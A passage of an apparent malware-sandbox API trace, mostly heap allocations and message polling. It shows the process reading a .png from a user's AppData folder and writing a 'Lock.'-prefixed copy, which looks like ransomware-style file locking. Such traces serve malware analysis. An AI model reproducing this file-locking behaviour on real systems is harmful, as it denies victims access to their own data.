1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/GHNzGfsXtZO 6LRI5J.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ghnzgfsxtzo 6lri5j.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0199.012] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.012] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0199.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.GHNzGfsXtZO 6LRI5J.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.ghnzgfsxtzo 6lri5j.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0199.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.013] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.013] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.013] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.014] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.014] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0199.014] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xc2ab, lpOverlapped=0x0) returned 1 [0199.016] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0199.016] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc2ab) returned 0x24d7a58 [0199.017] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.017] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.017] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0199.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0199.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc2ab) returned 0x24d7a58 [0199.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc2ab) returned 0x34b2250 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.022] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.023] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.023] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.023] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.026] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 